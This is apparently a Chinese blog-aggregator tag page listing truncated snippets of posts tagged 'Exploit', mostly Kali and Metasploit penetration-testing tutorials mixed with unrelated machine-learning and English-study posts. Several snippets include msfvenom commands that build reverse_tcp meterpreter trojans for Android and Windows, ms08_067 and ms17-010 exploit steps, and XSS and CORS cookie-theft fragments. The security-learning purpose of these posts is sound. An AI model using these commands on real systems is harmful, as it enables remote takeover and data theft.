Exploit

windows攻击实验

192.168.11.131实验步骤:1.首先攻击机和靶机互ping,在kali终端开启msfconsole2.查找是否存在ms08_067漏洞,查看返回信息,会显示出找到的渗透模块3.输入命令useexploit
20189223·2019-04-11 20:00

利用Kali入侵局域网的手机

*(本地IP)LPORT=*(本地端口)-o*(输出目录)启动postgresql数据库servicepostgresqlstart启动msfconsolemsfconsole使用探测句柄useexploit
铿锵的玫瑰·2019-03-30 11:36

kali linux ms17-010漏洞利用

useauxiliary/scanner/smb/smb_ms17_010需要配置IP,命令为setrhostsIP(目标ip段例如117.128.58.0/24)成功为绿,失败为红远程漏洞代码利用模块exploit
起风了Samu·2019-03-14 14:53

Basic Linux Privilege Escalation

moreenumerationandsomemoreenumeration.Process-Sortthroughdata,analyseandprioritisation.Search-Knowwhattosearchforandwheretofindtheexploitcode.A
APT-101·2019-03-09 17:00

安卓木马的生成及使用

msfvenom-pandroid/meterpreter/reverse_tcpLHOST=192.168.1.106(kaliIP)LPORT=5555R>/root/a.apk安装到手机(只能自己安装优化中)选择指定的Exploit
潺趣·2019-03-03 19:25

【漏洞学习——CSRF】bilibili某处csrf漏洞

csrf位置在用户中心-->过滤管理中http://member.bilibili.com/#gl_managepocCSRF/exploit--bilibilidocument.forms[0]
FLy_鹏程万里·2019-02-22 17:00

Metasploit输出重定向到文件

Metasploit是我们经常会使用到的神器,但是运行exploit/run无法保存输出信息,查看不是很方便。
starnight_cyber·2019-02-22 16:00

网络安全入门术语必知

转载地址:https://www.zhihu.com/question/26053378poc:proofofconcept;漏洞证明,一般就是个样本vul:Vulnerability泛指漏洞exp(Exploit
L6y1a·2019-02-20 14:53

Kali Linux(Metasploit简介及信息收集模块使用)

专业术语:exploit(渗透攻击)测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。payload(攻击载荷)攻击者在目标系统上执
大方子·2019-02-03 10:44

Hack The Box - Curling Writeup

不需要exploit这个界面,因为80端口上的网页源代码中提示了有secret.txt。Base64解码后得到Curling2
ShinJoe·2019-02-02 09:55

RHEL6普通用户提权到root

需要首先有个普通用户的shell实验环境:RHEL6.8应该只针对RHEL5/6,别的版本没试如下都是在普通用户下执行的,例如oracle用户mkdir/tmp/exploitln/bin/ping/tmp
与尔同销万古愁·2019-01-30 13:00

android kernel | 环境搭建 + 第一次尝试

aosp.tuna.tsinghua.edu.cn/kernel/goldfish.git漏洞项目代码下载gitclonehttps://github.com/Fuzion24/AndroidKernelExploitationPlayground.gitkerne
fantasy_learner·2019-01-29 20:08

贝叶斯优化(BayesianOptimization)

Upperconfidencebound)PI(probabilityofimprovement)EI(Expectedimprovement)算法流程贝叶斯优化的一个模拟实验探索(exploration)与利用(exploitation
Leon_winter·2019-01-23 21:20

【E-Net & LinkNet】For Efficient

ENet:ADeepNeuralNetworkArchitectureforReal-TimeSemanticsegmentation.LinkNet:ExploitingEncoderRepresentationsforEfficientSemanticSegmentation
One__Coder·2019-01-11 20:16

kali渗透测试win7

meterpreter/reverse_tcplhost=自己地址lport=端口号-fexex>XX.exe把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接在kali中msfconsolemsf>useexploit
小布丁吃西瓜·2019-01-06 14:38

使用Kali生成木马控制安卓手机

meterpreter/reverse_tcpLHOST=你kali的ipLPORT=5555R>/root/mm.apk生成木马位置输入命令:msfconsole来启动msfconsole然后1.useexploit
小布丁吃西瓜·2019-01-06 13:58

ThinkPHP远程命令执行漏洞原理及复现

2018年12月11日,exploit-db更新了一个thinkphp框架远程代码执行漏洞exploit地址:https://www.exploit-db.com/exploits/45978由于框架对控制器名没有进行足够的检测导致在没有开启强制路由的情况下
Snow狼·2019-01-04 15:47

[AAAI2019]Exploiting Local Feature Patterns for Unsupervised Domain Adaptation 利用局部特征进行无监督域适应

论文地址:https://arxiv.org/abs/1811.05042背景像条件对抗域适应(CADA)一文中所说,当前的对抗网络中只对齐数据整体特征,而只对齐数据的整体特征将会导致网络无法捕捉数据的多模态结构,这会使得网络尽管生成器和判别器都训练的比较好,但是最终的域适应效果依然不理想。在这篇文章中也考虑到了这种缺陷,提出利用局部特征的优势来解决这个问题,通过对整体特征和局部特征同时对齐来完成
LiGuang923·2019-01-02 16:26

常见运维系统类漏洞

漏洞可以通过搜索引擎搜索,github搜索,ExploitDB搜索,官网上的安全通告获取。内网的通用类应用比较常见的问题是弱口令,如果一
FLy_鹏程万里·2018-12-17 09:53

Linux 下 MySQL UDF 提权小记

实验环境:Ver14.14Distrib5.5.60,fordebian-linux-gnu(x86_64)usingreadline6.3可用POC:https://0xdeadbeef.info/exploits
小猪配不齐·2018-12-17 08:02

GRE长难填空积累

写在前面:逻辑比单词重要,结构比意思重要Agenciesresponsibleforprotectingnaturalresourcestoooftenissuepermitsallowingexploitationofthoseresources
姚宝淇·2018-12-10 20:55

XSS拿Cookie

payload:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSSinjection#exploit-code-or-pocXSS
caiqiiqi·2018-12-03 11:33

跨域资源共享(CORS)漏洞详解-大咖聂心明-漏洞银行大咖面对面第84期

poc:CORSPOCExploitExtractSIDExploitfunctioncors(){varxhttp=newXMLHttpRequest();xhttp.onreadystatechange
niexinming·2018-12-01 15:55

内网渗透----Windows下信息收集

一、基础信息收集使用systeminfo命令查看操作系统版本、架构、补丁情况Windows-Exploit-Suggester-master-u参数升级并将数据库下载至本地:-i参数指定系统信息文件;-
qianxiao996·2018-12-01 11:25

kali渗透XP

用kaliping目标靶机XP+靶机IP地址使用:msfconsole使用searchms08_067useexploit/windows/smb/ms08_067_netapishowoptionssetRHOST192.168.1.28showoptionsshowpayloads
Fithing·2018-11-28 16:00

活体检测新文by京东金融:利用多帧人脸来预测更精确的深度

接着上次的《活体检测Faceanti-spoofing综述》,再来讲讲arXiv上新挂的文章:京东金融和中科院联合发表的“Exploitingtemporalanddepthinformationformulti-framefaceanti-spoofing
SIGAI_csdn·2018-11-21 12:05

从sql注入到shell

攻击分为三步进行:1.Fingerprinting2.Detectionandexploitationof
jackcily·2018-11-19 23:34

Metasploit之渗透安卓实战

那么对于kali-linux连接木马的方式还是和之前的一样,利用“exploit/
Alvin_csdnee·2018-11-18 14:45

DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)

DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)3.提权1)补丁漏洞审计(1)systeminfo生成文件systeminfo>dedecms.txt(2)更新windows-exploit-suggester
SouthWind0·2018-11-17 22:49

33.《Metasploit渗透测试魔鬼训练营》笔记

漏洞分析与利用漏洞贡献计划:Zero-DayImitative、iDefense公共资源库:CNNVD、CNVD、乌云、SCAP、CVE、NVD、SecurityFocus、OSVDBMetasploit、Exploit
为梦想战斗·2018-11-12 20:02

记一次虚拟机环境的dns劫持实验

虚拟机别打太多补丁,毕竟为了试验首先,两台电脑都打开接下来,对kali进行操作首先查看ip和网卡指令ifconfig接着打开Metasploit命令行模式指令msfconsole选择漏洞利用攻击模块useexploit
黑暗巫妖·2018-11-09 15:16

TED演讲 | 压榨学生的大学贷款

在日渐浮躁的今天我们不盲从、不封闭、不恶意评判用TED开阔视野HowcollegeloansexploitstudentsforprofitTED简介:2016|曾几何时在美国上大学不需要背负债务,而现如今高等教育已然成为了消费品
BBC英语听力·2018-11-03 00:00

Metasploit远程代码执行

Metasploit之远程代码执行本次漏洞利用的是ms08-067的XP漏洞metasploit下进行操作search08-067-->搜索漏洞相关的模块,得到exploit/windows/smb/ms08
Deep In·2018-11-02 12:26

Metasploit Framework(MSF)的使用

目录Metasploit安装Metasploit漏洞利用(exploit)攻击载荷(payload)MeterpreterMS17_010(永恒之蓝)辅助模块(探测模块)漏洞利用模块后渗透阶段查看主机是否运行在虚拟机上关闭杀毒软件获取目标主机的详细信息访问文件系统上传
谢公子·2018-10-24 14:07

Python-实现与metasploit交互并进行ms17_010攻击

utf-8-*-__author__="MuT6Sch01aR"importosdefHandler(configFile,lhost,lport,rhost):configFile.write('useexploit
Zvall·2018-10-24 09:03

Pwntools使用介绍

pwntools是一个用python编写的CTFpwn题exploit编写工具,目的是为了帮助使用者更高效便捷地编写exploit。目前最新稳定版本为3.12.0(2018年5月)。
Alex0Young·2018-10-18 20:55

Pwntools使用介绍

pwntools是一个用python编写的CTFpwn题exploit编写工具,目的是为了帮助使用者更高效便捷地编写exploit。目前最新稳定版本为3.12.0(2018年5月)。
Alex0Young·2018-10-18 20:55

CVE-2012-1675

描述:TheremoteOracleTNSlistenerallowsserviceregistrationfromaremotehost.Anattackercanexploitthisissuetodivertdatafromalegitimatedatabaseserverorclienttoanattacker-specifiedsystem.Successfulexploitswilla
DBAngelica·2018-10-15 17:45

PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案

漏洞说明不得不再次吐槽一下exploit-db对exp审核的质量,这个exp仍然不能触发漏洞,修改第一个参数则可以触发,我给出的poc是一个可以触发php漏洞的,问题出现在php_tidy.dll扩展中
k0shl·2018-10-14 10:06

Q learning参数的补充说明

1、epsilongreedy算法Q:如何理解greed-epsilon方法/如何设置epsilon/如何理解exploration&exploitation权衡?
Walter_Silva·2018-10-09 19:57

MS15-051 修正版Exploit(Webshell可用)

MS15-051简介:Windows内核模式驱动程序中的漏洞可能允许特权提升(3057191),如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。远程或匿名用户无法利用此漏洞。官方表示该漏洞影响的操作系统有:WindowsServer
大方子·2018-10-06 23:18

【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞

背景从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在过去的五月中,这个Exploit被多款恶意软件利用。
maybezyy·2018-10-03 15:21

关于PwnTools的各种汇总

大致框架官网的一个简单样例frompwnimport*#用来导入pwntools模块context(arch='i386',os='linux')#用来设置目标机的信息r=remote('exploitme.example.com
Retrovich·2018-09-26 21:05

BoxSup: Exploiting Bounding Boxes to Supervise Convolutional Networks for Semantic Segmentation读书笔记

  在人工智能领域有一句很流行的话:“有多少人工,就有多少智能”。这确实是一个很尴尬的问题,计算机的理解能力是建立在大量的人工标注数据之上的。我们知道,数据标注需要很高的成本,特别是像素级的图像,而且在复杂场景之下,也非常容易出错。  俗话说,人民的智慧是无穷的。为了改善或者解决这个问题,弱监督和无监督学习得到了用武之地。  好了,说到这篇论文,本文讨论的是弱监督学习的问题,主要内容是利用boun
haoshengup·2018-09-20 09:41

利用不安全的跨源资源共享(CORS)---api.artsy.net

翻译自https://bugbountypoc.com/exploiting-cross-origin-resource-sharing/(这个网站会公开获得赏金的漏洞的poc,方法,思路)译者:聂心明利用不安全的跨源资源共享
niexinming·2018-09-17 09:52

BeEF的使用

目录BeEFBeEF-XSS的使用获取用户Cookie网页重定向社工弹窗钓鱼网站(结合DNS欺骗)BeEFBEEF(TheBrowserExploitationFramework):一款浏览器攻击框架,
谢公子·2018-09-17 08:15

强化学习系列(十一):Off-policy Methods with Approximation

一、前言针对Policyiteration中存在的exploitation问题,在第五章中将强化学习算法分为on-policy算法和off-policy算法。
LagrangeSK·2018-09-05 14:15

提权辅助工具Windows—Exploit-Suggester

这个工具可以根据windows系统的信息情况跟微软的漏洞库进行比对,筛选出可以用于攻击的exploit
大方子·2018-08-31 22:57

Metasploit

专业术语渗透攻击(exploit):测试者利用系统、程序或服务的漏洞进行攻击的一个过程攻击载荷(
XYTHT·2018-08-31 12:03

《傻姑娘愿你好好的(15)》

Thisseemsajustificationforneglectofthoseinneed,andarationalizationofexploitation,ofthesuperiorityofthoseatthetopandtheinferiorityofthoseatthebottom
傻姑娘愿你好好的·2018-08-22 21:43
上一页 27 28 29 30 31 32 33 34 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他